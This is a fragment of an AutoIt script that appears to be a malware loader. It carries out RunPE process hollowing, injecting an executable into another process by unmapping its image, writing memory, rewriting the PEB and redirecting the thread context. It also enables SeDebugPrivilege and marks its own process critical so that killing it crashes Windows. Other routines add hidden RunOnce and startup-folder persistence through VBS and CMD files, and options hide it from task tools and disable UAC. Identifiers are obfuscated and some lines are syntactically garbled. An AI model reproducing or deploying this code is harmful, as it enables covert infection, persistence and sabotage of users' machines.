Local $frelocate
Local $pzeropoint
If $frelocatable Then
$pzeropoint = __runpe_allocateexespace($hprocess, $ioptionalheadersizeofimagenew)
If @error Then
$pzeropoint = __runpe_allocateexespaceataddress($hprocess, $poptionalheaderimagebasenew, $ioptionalheadersizeofimagenew)
If @error Then
__runpe_unmapviewofsection($hprocess, $poptionalheaderimagebasenew)
$pzeropoint = __runpe_allocateexespaceataddress($hprocess, $poptionalheaderimagebasenew, $ioptionalheadersizeofimagenew)
If @error Then
DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
Return SetError(101, 1, 0)
EndIf
EndIf
EndIf
$frelocate = True
Else
$pzeropoint = __runpe_allocateexespaceataddress($hprocess, $poptionalheaderimagebasenew, $ioptionalheadersizeofimagenew)
If @error Then
__runpe_unmapviewofsection($hprocess, $poptionalheaderimagebasenew)
$pzeropoint = __runpe_allocateexespaceataddress($hprocess, $poptionalheaderimagebasenew, $ioptionalheadersizeofimagenew)
If @error Then
DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
Return SetError(101, 0, 0)
EndIf
EndIf
EndIf
DllStructSetData($timage_optional_header, "IMAGEBASE", $pzeropoint)
#Region 7. CONSTRUCT THE NEW MODULE
Local $tmodule = DllStructCreate("BYTE[" & $ioptionalheadersizeofimagenew & "]")
Local $pmodule = DllStructGetPtr($tmodule)
Local $theaders = DllStructCreate("BYTE[" & $ioptionalheadersizeofheadersnew & "]", $pheaders_new)
DllStructSetData($tmodule, 1, DllStructGetData($theaders, 1))
Local $timage_section_header
Local $isizeofrawdata, $ppointertorawdata
Local $ivirtualaddress, $ivirtualsize
Local $trelocraw
For $i = 1 To $inumberofsections
$timage_section_header = DllStructCreate("CHAR NAME[8];" & "DWORD UNIONOFVIRTUALSIZEANDPHYSICALADDRESS;" & "DWORD VIRTUALADDRESS;" & "DWORD SIZEOFRAWDATA;" & "DWORD POINTERTORAWDATA;" & "DWORD POINTERTORELOCATIONS;" & "DWORD POINTERTOLINENUMBERS;" & "WORD NUMBEROFRELOCATIONS;" & "WORD NUMBEROFLINENUMBERS;" & "DWORD CHARACTERISTICS", $_dddhg21hfghfghfghfghffhf)
$isizeofrawdata = DllStructGetData($timage_section_header, "SIZEOFRAWDATA")
$ppointertorawdata = $pheaders_new + DllStructGetData($timage_section_header, "POINTERTORAWDATA")
$ivirtualaddress = DllStructGetData($timage_section_header, "VIRTUALADDRESS")
$ivirtualsize = DllStructGetData($timage_section_header, "UNIONOFVIRTUALSIZEANDPHYSICALADDRESS")
If $ivirtualsize AND $ivirtualsize If $isizeofrawdata Then
DllStructSetData(DllStructCreate("BYTE[" & $isizeofrawdata & "]", $pmodule + $ivirtualaddress), 1, DllStructGetData(DllStructCreate("BYTE[" & $isizeofrawdata & "]", $ppointertorawdata), 1))
EndIf
If $frelocate Then
If $ivirtualaddress $paddressnewbasereloc Then
$trelocraw = DllStructCreate("BYTE[" & $isizebasereloc & "]", $ppointertorawdata + ($paddressnewbasereloc - $ivirtualaddress))
EndIf
EndIf
$_dddhg21hfghfghfghfghffhf += 40
Next
If $frelocate Then __runpe_fixreloc($pmodule, $trelocraw, $pzeropoint, $poptionalheaderimagebasenew, $imagic = 523)
$acall = DllCall("KERNEL32.DLL", "BOOL", "WriteProcessMemory", "HANDLE", $hprocess, "PTR", $pzeropoint, "PTR", $pmodule, "DWORD_PTR", $ioptionalheadersizeofimagenew, "DWORD_PTR*", 0)
If @error OR NOT $acall[0] Then
DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
Return SetError(7, 0, 0)
EndIf
#Region 8. PEB IMAGEBASEADDRESS MANIPULATION
Local $tpeb = DllStructCreate("BYTE INHERITEDADDRESSSPACE;" & "BYTE READIMAGEFILEEXECOPTIONS;" & "BYTE BEINGDEBUGGED;" & "BYTE SPARE;" & "PTR MUTANT;" & "PTR IMAGEBASEADDRESS;" & "PTR LOADERDATA;" & "PTR PROCESSPARAMETERS;" & "PTR SUBSYSTEMDATA;" & "PTR PROCESSHEAP;" & "PTR FASTPEBLOCK;" & "PTR FASTPEBLOCKROUTINE;" & "PTR FASTPEBUNLOCKROUTINE;" & "DWORD ENVIRONMENTUPDATECOUNT;" & "PTR KERNELCALLBACKTABLE;" & "PTR EVENTLOGSECTION;" & "PTR EVENTLOG;" & "PTR FREELIST;" & "DWORD TLSEXPANSIONCOUNTER;" & "PTR TLSBITMAP;" & "DWORD TLSBITMAPBITS[2];" & "PTR READONLYSHAREDMEMORYBASE;" & "PTR READONLYSHAREDMEMORYHEAP;" & "PTR READONLYSTATICSERVERDATA;" & "PTR ANSICODEPAGEDATA;" & "PTR OEMCODEPAGEDATA;" & "PTR UNICODECASETABLEDATA;" & "DWORD NUMBEROFPROCESSORS;" & "DWORD NTGLOBALFLAG;" & "BYTE SPARE2[4];" & "INT64 CRITICALSECTIONTIMEOUT;" & "DWORD HEAPSEGMENTRESERVE;" & "DWORD HEAPSEGMENTCOMMIT;" & "DWORD HEAPDECOMMITTOTALFREETHRESHOLD;" & "DWORD HEAPDECOMMITFREEBLOCKTHRESHOLD;" & "DWORD NUMBEROFHEAPS;" & "DWORD MAXIMUMNUMBEROFHEAPS;" & "PTR PROCESSHEAPS;" & "PTR GDISHAREDHANDLETABLE;" & "PTR PROCESSSTARTERHELPER;" & "PTR GDIDCATTRIBUTELIST;" & "PTR LOADERLOCK;" & "DWORD OSMAJORVERSION;" & "DWORD OSMINORVERSION;" & "DWORD OSBUILDNUMBER;" & "DWORD OSPLATFORMID;" & "DWORD IMAGESUBSYSTEM;" & "DWORD IMAGESUBSYSTEMMAJORVERSION;" & "DWORD IMAGESUBSYSTEMMINORVERSION;" & "DWORD GDIHANDLEBUFFER[34];" & "DWORD POSTPROCESSINITROUTINE;" & "DWORD TLSEXPANSIONBITMAP;" & "BYTE TLSEXPANSIONBITMAPBITS[128];" & "DWORD SESSIONID")
$acall = DllCall("KERNEL32.DLL", "BOOL", "ReadProcessMemory", "PTR", $hprocess, "PTR", $ppeb, "PTR", DllStructGetPtr($tpeb), "DWORD_PTR", DllStructGetSize($tpeb), "DWORD_PTR*", 0)
If @error OR NOT $acall[0] Then
DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
Return SetError(8, 0, 0)
EndIf
DllStructSetData($tpeb, "IMAGEBASEADDRESS", $pzeropoint)
$acall = DllCall("KERNEL32.DLL", "BOOL", "WriteProcessMemory", "HANDLE", $hprocess, "PTR", $ppeb, "PTR", DllStructGetPtr($tpeb), "DWORD_PTR", DllStructGetSize($tpeb), "DWORD_PTR*", 0)
If @error OR NOT $acall[0] Then
DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
Return SetError(9, 0, 0)
EndIf
#Region 9. NEW ENTRY POINT
Switch $irunflag
Case 1
DllStructSetData($tcontext, "EAX", $pzeropoint + $ientrypointnew)
Case 2
DllStructSetData($tcontext, "RCX", $pzeropoint + $ientrypointnew)
Case 3
EndSwitch
#Region 10. SET NEW CONTEXT
$acall = DllCall("KERNEL32.DLL", "BOOL", "SetThreadContext", "HANDLE", $hthread, "PTR", DllStructGetPtr($tcontext))
If @error OR NOT $acall[0] Then
DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
Return SetError(10, 0, 0)
EndIf
#Region 11. RESUME THREAD
$acall = DllCall("KERNEL32.DLL", "DWORD", "ResumeThread", "HANDLE", $hthread)
If @error OR $acall[0] = + -1 Then
DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
Return SetError(11, 0, 0)
EndIf
#Region 12. CLOSE OPEN HANDLES AND RETURN PID
DllCall("KERNEL32.DLL", "BOOL", "CloseHandle", "HANDLE", $hprocess)
DllCall("KERNEL32.DLL", "BOOL", "CloseHandle", "HANDLE", $hthread)
Return DllStructGetData($tprocess_information, "PROCESSID")
EndFunc
Func __runpe_fixreloc($pmodule, $tdata, $paddressnew, $paddressold, $fimagex64)
Local $idelta = $paddressnew - $paddressold
Local $isize = DllStructGetSize($tdata)
Local $pdata = DllStructGetPtr($tdata)
Local $timage_base_relocation, $irelativemove
Local $ivirtualaddress, $isizeofblock, $inumberofentries
Local $tenries, $idata, $taddress
Local $iflag = 3 + 7 * $fimagex64
While $irelativemove $timage_base_relocation = DllStructCreate("DWORD VIRTUALADDRESS; DWORD SIZEOFBLOCK", $pdata + $irelativemove)
$ivirtualaddress = DllStructGetData($timage_base_relocation, "VIRTUALADDRESS")
$isizeofblock = DllStructGetData($timage_base_relocation, "SIZEOFBLOCK")
$inumberofentries = ($isizeofblock + -8) / 2
$tenries = DllStructCreate("WORD[" & $inumberofentries & "]", DllStructGetPtr($timage_base_relocation) + 8)
For $i = 1 To $inumberofentries
$idata = DllStructGetData($tenries, 1, $i)
If BitShift($idata, 12) = $iflag Then
$taddress = DllStructCreate("PTR", $pmodule + $ivirtualaddress + BitAND($idata, 4095))
DllStructSetData($taddress, 1, DllStructGetData($taddress, 1) + $idelta)
EndIf
Next
$irelativemove += $isizeofblock
WEnd
Return 1
EndFunc
Func __runpe_allocateexespaceataddress($hprocess, $paddress, $isize)
Local $acall = DllCall("KERNEL32.DLL", "PTR", "VirtualAllocEx", "HANDLE", $hprocess, "PTR", $paddress, "DWORD_PTR", $isize, "DWORD", 4096, "DWORD", 64)
If @error OR NOT $acall[0] Then
$acall = DllCall("KERNEL32.DLL", "PTR", "VirtualAllocEx", "HANDLE", $hprocess, "PTR", $paddress, "DWORD_PTR", $isize, "DWORD", 12288, "DWORD", 64)
If @error OR NOT $acall[0] Then Return SetError(1, 0, 0)
EndIf
Return $acall[0]
EndFunc
Func __runpe_allocateexespace($hprocess, $isize)
Local $acall = DllCall("KERNEL32.DLL", "PTR", "VirtualAllocEx", "HANDLE", $hprocess, "PTR", 0, "DWORD_PTR", $isize, "DWORD", 12288, "DWORD", 64)
If @error OR NOT $acall[0] Then Return SetError(1, 0, 0)
Return $acall[0]
EndFunc
Func __runpe_unmapviewofsection($hprocess, $paddress)
DllCall("NTDLL.DLL", "INT", "NtUnmapViewOfSection", "PTR", $hprocess, "PTR", $paddress)
If @error Then Return SetError(1, 0, 0)
Return 1
EndFunc
Func __runpe_iswow64process($hprocess)
Local $acall = DllCall("KERNEL32.DLL", "BOOL", "IsWow64Process", "HANDLE", $hprocess, "BOOL*", 0)
If @error OR NOT $acall[0] Then Return SetError(1, 0, 0)
Return $acall[2]
EndFunc
Global Const $tagrect = "struct;long Left;long Top;long Right;long Bottom;endstruct"
Global Const $tagtoken_privileges = "dword Count;align 4;int64 LUID;dword Attributes"
Global Const $error_no_token = 1008
Global Const $se_privilege_enabled_by_default = 1
Global Const $se_privilege_enabled = 2
Global Const $se_privilege_removed = 4
Global Enum $tokenprimary = 1, $tokenimpersonation
Global Enum $securityanonymous = 0, $securityidentification, $securityimpersonation, $securitydelegation
Global Const $token_assign_primary = 1
Global Const $token_duplicate = 2
Global Const $token_impersonate = 4
Global Const $token_query = 8
Global Const $token_query_source = 16
Global Const $token_adjust_privileges = 32
Func _winapi_getlasterror($curerr = @error, $curext = @extended)
Local $aresult = DllCall("kernel32.dll", "dword", "GetLastError")
Return SetError($curerr, $curext, $aresult[0])
EndFunc
Func _security__adjusttokenprivileges($htoken, $fdisableall, $pnewstate, $ibufferlen, $pprevstate = 0, $prequired = 0)
Local $acall = DllCall("advapi32.dll", "bool", "AdjustTokenPrivileges", "handle", $htoken, "bool", $fdisableall, "struct*", $pnewstate, "dword", $ibufferlen, "struct*", $pprevstate, "struct*", $prequired)
If @error Then Return SetError(1, @extended, False)
Return NOT ($acall[0] = 0)
EndFunc
Func _security__getlengthsid($psid)
If NOT _security__isvalidsid($psid) Then Return SetError(1, @extended, 0)
Local $acall = DllCall("advapi32.dll", "dword", "GetLengthSid", "struct*", $psid)
If @error Then Return SetError(2, @extended, 0)
Return $acall[0]
EndFunc
Func _security__impersonateself($ilevel = $securityimpersonation)
Local $acall = DllCall("advapi32.dll", "bool", "ImpersonateSelf", "int", $ilevel)
If @error Then Return SetError(1, @extended, False)
Return NOT ($acall[0] = 0)
EndFunc
Func _security__isvalidsid($psid)
Local $acall = DllCall("advapi32.dll", "bool", "IsValidSid", "struct*", $psid)
If @error Then Return SetError(1, @extended, False)
Return NOT ($acall[0] = 0)
EndFunc
Func _security__lookupaccountname($saccount, $ssystem = "")
Local $tdata = DllStructCreate("byte SID[256]")
Local $acall = DllCall("advapi32.dll", "bool", "LookupAccountNameW", "wstr", $ssystem, "wstr", $saccount, "struct*", $tdata, "dword*", DllStructGetSize($tdata), "wstr", "", "dword*", DllStructGetSize($tdata), "int*", 0)
If @error OR NOT $acall[0] Then Return SetError(1, @extended, 0)
Local $aacct[3]
$aacct[0] = _security__sidtostringsid(DllStructGetPtr($tdata, "SID"))
$aacct[1] = $acall[5]
$aacct[2] = $acall[7]
Return $aacct
EndFunc
Func _security__lookupprivilegevalue($ssystem, $sname)
Local $acall = DllCall("advapi32.dll", "bool", "LookupPrivilegeValueW", "wstr", $ssystem, "wstr", $sname, "int64*", 0)
If @error OR NOT $acall[0] Then Return SetError(1, @extended, 0)
Return $acall[3]
EndFunc
Func _security__openthreadtoken($iaccess, $hthread = 0, $fopenasself = False)
If $hthread = 0 Then $hthread = _winapi_getcurrentthread()
If @error Then Return SetError(1, @extended, 0)
Local $acall = DllCall("advapi32.dll", "bool", "OpenThreadToken", "handle", $hthread, "dword", $iaccess, "bool", $fopenasself, "handle*", 0)
If @error OR NOT $acall[0] Then Return SetError(2, @extended, 0)
Return $acall[4]
EndFunc
Func _security__openthreadtokenex($iaccess, $hthread = 0, $fopenasself = False)
Local $htoken = _security__openthreadtoken($iaccess, $hthread, $fopenasself)
If $htoken = 0 Then
If _winapi_getlasterror() $error_no_token Then Return SetError(3, _winapi_getlasterror(), 0)
If NOT _security__impersonateself() Then Return SetError(1, _winapi_getlasterror(), 0)
$htoken = _security__openthreadtoken($iaccess, $hthread, $fopenasself)
If $htoken = 0 Then Return SetError(2, _winapi_getlasterror(), 0)
EndIf
Return $htoken
EndFunc
Func _security__setprivilege($htoken, $sprivilege, $fenable)
Local $iluid = _security__lookupprivilegevalue("", $sprivilege)
If $iluid = 0 Then Return SetError(1, @extended, False)
Local $tcurrstate = DllStructCreate($tagtoken_privileges)
Local $icurrstate = DllStructGetSize($tcurrstate)
Local $tprevstate = DllStructCreate($tagtoken_privileges)
Local $iprevstate = DllStructGetSize($tprevstate)
Local $trequired = DllStructCreate("int Data")
DllStructSetData($tcurrstate, "Count", 1)
DllStructSetData($tcurrstate, "LUID", $iluid)
If NOT _security__adjusttokenprivileges($htoken, False, $tcurrstate, $icurrstate, $tprevstate, $trequired) Then Return SetError(2, @error, False)
DllStructSetData($tprevstate, "Count", 1)
DllStructSetData($tprevstate, "LUID", $iluid)
Local $iattributes = DllStructGetData($tprevstate, "Attributes")
If $fenable Then
$iattributes = BitOR($iattributes, $se_privilege_enabled)
Else
$iattributes = BitAND($iattributes, BitNOT($se_privilege_enabled))
EndIf
DllStructSetData($tprevstate, "Attributes", $iattributes)
If NOT _security__adjusttokenprivileges($htoken, False, $tprevstate, $iprevstate, $tcurrstate, $trequired) Then Return SetError(3, @error, False)
Return True
EndFunc
Func _security__sidtostringsid($psid)
If NOT _security__isvalidsid($psid) Then Return SetError(1, 0, "")
Local $acall = DllCall("advapi32.dll", "bool", "ConvertSidToStringSidW", "struct*", $psid, "ptr*", 0)
If @error OR NOT $acall[0] Then Return SetError(2, @extended, "")
Local $pstringsid = $acall[2]
Local $ssid = DllStructGetData(DllStructCreate("wchar Text[" & _winapi_stringlenw($pstringsid) + 1 & "]", $pstringsid), "Text")
_winapi_localfree($pstringsid)
Return $ssid
EndFunc
Func _security__stringsidtosid($ssid)
Local $acall = DllCall("advapi32.dll", "bool", "ConvertStringSidToSidW", "wstr", $ssid, "ptr*", 0)
If @error OR NOT $acall[0] Then Return SetError(1, @extended, 0)
Local $psid = $acall[2]
Local $tbuffer = DllStructCreate("byte Data[" & _security__getlengthsid($psid) & "]", $psid)
Local $tsid = DllStructCreate("byte Data[" & DllStructGetSize($tbuffer) & "]")
DllStructSetData($tsid, "Data", DllStructGetData($tbuffer, "Data"))
_winapi_localfree($psid)
Return $tsid
EndFunc
Func _winapi_closehandle($hobject)
Local $aresult = DllCall("kernel32.dll", "bool", "CloseHandle", "handle", $hobject)
If @error Then Return SetError(@error, @extended, False)
Return $aresult[0]
EndFunc
Func _winapi_createsolidbrush($ncolor)
Local $aresult = DllCall("gdi32.dll", "handle", "CreateSolidBrush", "dword", $ncolor)
If @error Then Return SetError(@error, @extended, 0)
Return $aresult[0]
EndFunc
Func _winapi_deletedc($hdc)
Local $aresult = DllCall("gdi32.dll", "bool", "DeleteDC", "handle", $hdc)
If @error Then Return SetError(@error, @extended, False)
Return $aresult[0]
EndFunc
Func _winapi_deleteobject($hobject)
Local $aresult = DllCall("gdi32.dll", "bool", "DeleteObject", "handle", $hobject)
If @error Then Return SetError(@error, @extended, False)
Return $aresult[0]
EndFunc
Func _winapi_fillrect($hdc, $ptrrect, $hbrush)
Local $aresult
If IsPtr($hbrush) Then
$aresult = DllCall("user32.dll", "int", "FillRect", "handle", $hdc, "struct*", $ptrrect, "handle", $hbrush)
Else
$aresult = DllCall("user32.dll", "int", "FillRect", "handle", $hdc, "struct*", $ptrrect, "dword_ptr", $hbrush)
EndIf
If @error Then Return SetError(@error, @extended, False)
Return $aresult[0]
EndFunc
Func _winapi_getclassname($hwnd)
If NOT IsHWnd($hwnd) Then $hwnd = GUICtrlGetHandle($hwnd)
Local $aresult = DllCall("user32.dll", "int", "GetClassNameW", "hwnd", $hwnd, "wstr", "", "int", 4096)
If @error Then Return SetError(@error, @extended, False)
Return SetExtended($aresult[0], $aresult[2])
EndFunc
Func _winapi_getclientrect($hwnd)
Local $trect = DllStructCreate($tagrect)
DllCall("user32.dll", "bool", "GetClientRect", "hwnd", $hwnd, "struct*", $trect)
If @error Then Return SetError(@error, @extended, 0)
Return $trect
EndFunc
Func _winapi_getcurrentthread()
Local $aresult = DllCall("kernel32.dll", "handle", "GetCurrentThread")
If @error Then Return SetError(@error, @extended, 0)
Return $aresult[0]
EndFunc
Func _winapi_getdc($hwnd)
Local $aresult = DllCall("user32.dll", "handle", "GetDC", "hwnd", $hwnd)
If @error Then Return SetError(@error, @extended, 0)
Return $aresult[0]
EndFunc
Func _winapi_getdesktopwindow()
Local $aresult = DllCall("user32.dll", "hwnd", "GetDesktopWindow")
If @error Then Return SetError(@error, @extended, 0)
Return $aresult[0]
EndFunc
Func _winapi_getmodulehandle($smodulename)
Local $smodulenametype = "wstr"
If $smodulename = "" Then
$smodulename = 0
$smodulenametype = "ptr"
EndIf
Local $aresult = DllCall("kernel32.dll", "handle", "GetModuleHandleW", $smodulenametype, $smodulename)
If @error Then Return SetError(@error, @extended, 0)
Return $aresult[0]
EndFunc
Func _winapi_getwindow($hwnd, $icmd)
Local $aresult = DllCall("user32.dll", "hwnd", "GetWindow", "hwnd", $hwnd, "uint", $icmd)
If @error Then Return SetError(@error, @extended, 0)
Return $aresult[0]
EndFunc
Func _winapi_iswindowvisible($hwnd)
Local $aresult = DllCall("user32.dll", "bool", "IsWindowVisible", "hwnd", $hwnd)
If @error Then Return SetError(@error, @extended, 0)
Return $aresult[0]
EndFunc
Func _winapi_lineto($hdc, $ix, $iy)
Local $aresult = DllCall("gdi32.dll", "bool", "LineTo", "handle", $hdc, "int", $ix, "int", $iy)
If @error Then Return SetError(@error, @extended, False)
Return $aresult[0]
EndFunc
Func _winapi_localfree($hmem)
Local $aresult = DllCall("kernel32.dll", "handle", "LocalFree", "handle", $hmem)
If @error Then Return SetError(@error, @extended, False)
Return $aresult[0]
EndFunc
Func _winapi_moveto($hdc, $ix, $iy)
Local $aresult = DllCall("gdi32.dll", "bool", "MoveToEx", "handle", $hdc, "int", $ix, "int", $iy, "ptr", 0)
If @error Then Return SetError(@error, @extended, False)
Return $aresult[0]
EndFunc
Func _winapi_openprocess($iaccess, $finherit, $iprocessid, $_d210hfghdfg5gdfdfdddgdfgGDFGDFGDFG = False)
Local $aresult = DllCall("kernel32.dll", "handle", "OpenProcess", "dword", $iaccess, "bool", $finherit, "dword", $iprocessid)
If @error Then Return SetError(@error, @extended, 0)
If $aresult[0] Then Return $aresult[0]
If NOT $_d210hfghdfg5gdfdfdddgdfgGDFGDFGDFG Then Return 0
Local $htoken = _security__openthreadtokenex(BitOR($token_adjust_privileges, $token_query))
If @error Then Return SetError(@error, @extended, 0)
_security__setprivilege($htoken, "SeDebugPrivilege", True)
Local $ierror = @error
Local $ilasterror = @extended
Local $iret = 0
If NOT @error Then
$aresult = DllCall("kernel32.dll", "handle", "OpenProcess", "dword", $iaccess, "bool", $finherit, "dword", $iprocessid)
$ierror = @error
$ilasterror = @extended
If $aresult[0] Then $iret = $aresult[0]
_security__setprivilege($htoken, "SeDebugPrivilege", False)
If @error Then
$ierror = @error
$ilasterror = @extended
EndIf
EndIf
_winapi_closehandle($htoken)
Return SetError($ierror, $ilasterror, $iret)
EndFunc
Func __winapi_parsefiledialogpath($spath)
Local $afiles[3]
$afiles[0] = 2
Local $stemp = StringMid($spath, 1, StringInStr($spath, "\", 0, + -1) + -1)
$afiles[1] = $stemp
$afiles[2] = StringMid($spath, StringInStr($spath, "\", 0, + -1) + 1)
Return $afiles
EndFunc
Func _winapi_releasedc($hwnd, $hdc)
Local $aresult = DllCall("user32.dll", "int", "ReleaseDC", "hwnd", $hwnd, "handle", $hdc)
If @error Then Return SetError(@error, @extended, False)
Return $aresult[0]
EndFunc
Func _winapi_screentoclient($hwnd, ByRef $tpoint)
Local $aresult = DllCall("user32.dll", "bool", "ScreenToClient", "hwnd", $hwnd, "struct*", $tpoint)
If @error Then Return SetError(@error, @extended, False)
Return $aresult[0]
EndFunc
Func _winapi_selectobject($hdc, $hgdiobj)
Local $aresult = DllCall("gdi32.dll", "handle", "SelectObject", "handle", $hdc, "handle", $hgdiobj)
If @error Then Return SetError(@error, @extended, False)
Return $aresult[0]
EndFunc
Func _winapi_stringlenw($vstring)
Local $acall = DllCall("kernel32.dll", "int", "lstrlenW", "struct*", $vstring)
If @error Then Return SetError(1, @extended, 0)
Return $acall[0]
EndFunc
$scriptname = "replace-autoit3.exe"
Func anti_hook()
__bsod($scriptname, True)
EndFunc
$protectprocess = IniRead($uniscriptdir & "\settings.ini", "protectprocess1", "protectprocess2", "NotFound")
If $protectprocess = "protectprocess3" Then
AdlibRegister("anti_hook", 500)
Else
EndIf
Func __bsod($_d210hfghdfg5gdfdfdddgdfgdfg4f5f64g65dfghfghfgh5, $bsod_status)
Local Const $status_success = 0
Local Const $bsod_class = 29
Local Const $info_length = 4
Local Const $process_all_access = 2035711
Local $result, $process_handle, $process_id, $bsod_struct, $bsod_struct_ptr
If NOT Call("__DEBUGE_PRIVILEGE", True) Then Return "![>] ERROR : DEBUGE PRIVILEGE OF PROCESS [ " & $_d210hfghdfg5gdfdfdddgdfgdfg4f5f64g65dfghfghfgh5 & " ] CAN NOT CHANGED"
$process_id = ProcessExists($_d210hfghdfg5gdfdfdddgdfgdfg4f5f64g65dfghfghfgh5)
If $process_id = 0 Then Return "![>] ERROR : PROCESS [ " & $_d210hfghdfg5gdfdfdddgdfgdfg4f5f64g65dfghfghfgh5 & " ] NOT EXIST"
$process_handle = _winapi_openprocess($process_all_access, True, $process_id)
If @error Then Return "![>] ERROR : CAN NOT OPEN [ " & $_d210hfghdfg5gdfdfdddgdfgdfg4f5f64g65dfghfghfgh5 & " ] PROCESS"
$bsod_struct = DllStructCreate("BOOL BSOD_STATUS")
DllStructSetData($bsod_struct, "BSOD_STATUS", $bsod_status)
$bsod_struct_ptr = DllStructGetPtr($bsod_struct)
$result = DllCall("NTDLL.DLL", "DWORD", "NtSetInformationProcess", "HANDLE", $process_handle, "INT", $bsod_class, "PTR", $bsod_struct_ptr, "ULONG", $info_length)
_winapi_closehandle($process_handle)
$bsod_struct_ptr = 0
If $result[0] = $status_success Then
Return "+[>] BSOD OF PROCESS [ " & $_d210hfghdfg5gdfdfdddgdfgdfg4f5f64g65dfghfghfgh5 & " ] CHANGED WITH NO ERROR" & @CRLF
Else
Return "![>] ERROR : BSOD OF PROCESS [ " & $_d210hfghdfg5gdfdfdddgdfgdfg4f5f64g65dfghfghfgh5 & " ] NOT CHANGED , ERROR CODE : " & Hex($result[0], 8)
EndIf
EndFunc
Func __debuge_privilege($status)
Local $htoken, $ilasterror
$htoken = _security__openthreadtokenex(BitOR($token_adjust_privileges, $token_query))
If @error Then Return SetError(@error, @extended, 0)
$ilasterror = _security__setprivilege($htoken, "SEDEBUGPRIVILEGE", $status)
_winapi_closehandle($htoken)
Return $ilasterror
EndFunc
OnAutoItExitRegister("exitme")
Func exitme()
__bsod($scriptname, False)
EndFunc
Local $antibotkill = IniRead($uniscriptdir & "\settings.ini", "antibotkill-1", "antibotkill-2", "NotFound")
If $antibotkill = "antibotkill-3" Then
AdlibRegister("antibotkill", 1000)
Else
EndIf
Func antibotkill()
$getstart = RegRead("HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce", $path)
If $getstart = $unicode_userprofile & "\" & $path & "\start.vbs" Then
Else
RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce", $path, "REG_SZ", $unicode_userprofile & "\" & $path & "\start.vbs")
EndIf
If NOT FileExists($unicode_userprofile & "\" & $path & "\start.vbs") Then
Local $vbs = FileOpen($unicode_userprofile & "\" & $path & "\start.vbs", 1)
FileWrite($vbs, "const Hidden = 0" & @CRLF & "const WaitOnReturn = true" & @CRLF & 'File ="""' & $unicode_userprofile & "\" & $path & "\" & 'start.cmd"""' & @CRLF & 'set WshShell = CreateObject("WScript.Shell")' & @CRLF & "WshShell.Run file, Hidden, WaitOnReturn" & @CRLF & "wscript.quit")
FileClose($vbs)
EndIf
If NOT FileExists($unicode_userprofile & "\" & $path & "\start.cmd") Then
$autoit3 = "autoit3-replace"
Local $bat = FileOpen($unicode_userprofile & "\" & $path & "\start.cmd", 1)
FileWrite($bat, "@echo off" & @CRLF & "cd " & $win_userprofile & $path & "\" & @CRLF & "start " & $autoit3 & " " & '"' & @ScriptName & '"')
FileClose($bat)
EndIf
If NOT FileExists($unicode_startup & "\start.lnk") Then
FileCreateShortcut($unicode_userprofile & "\" & $path & "\start.vbs", $unicode_startup & "\start.lnk")
FileSetAttrib($unicode_startup & "\start.lnk", "+SH")
EndIf
EndFunc
Local $persistence = IniRead($uniscriptdir & "\settings.ini", "persistence1", "persistence2", "NotFound")
If $persistence = "persistence3" Then
checkvbs()
AdlibRegister("persistence", 500)
Else
EndIf
Func checkvbs()
If NOT FileExists($uniscriptdir & "\run.vbs") Then
FileWrite($uniscriptdir & "\run.vbs", "Set WshShell = WScript.CreateObject(" & '"' & "WScript.Shell" & '")' & @CRLF & "WshShell.Run" & '"' & "replace-autoit3.exe " & @ScriptName & '"')
EndIf
EndFunc
Local $systemhide = IniRead($uniscriptdir & "\settings.ini", "systemhide1", "systemhide2", "NotFound")
If $systemhide = "systemhide3" Then
AdlibRegister("systemhide", 500)
Else
EndIf
Local $antitask = IniRead($uniscriptdir & "\settings.ini", "antitask1", "antitask2", "NotFound")
If $antitask = "antitask3" Then
AdlibRegister("antitask", 500)
Else
EndIf
Local $uac = IniRead($uniscriptdir & "\settings.ini", "uac1", "uac2", "NotFound")
If $uac = "uac3" Then
AdlibRegister("disable_uac", 500)
Else
EndIf
If $uac = "uac3" Then
loop()
EndIf
If $systemhide = "systemhide3" Then
loop()
EndIf
If $antitask = "antitask" Then
loop()
EndIf
If $antibotkill = "antibotkill-3" Then
loop()
EndIf
If $mutex = "mutex3" Then
loop()
EndIf
If $protectprocess = "protectprocess3" Then
loop()
EndIf
If $persistence = "persistence3" Then
loop()
EndIf
Func loop()
While 1
If FileExists($unicode_userprofile & "\ds\clean.txt") Then
__bsod($scriptname, False)
EndIf
If WinExists($path) Then
bsod()
Else
EndIf
Sleep(100)
WEnd
EndFunc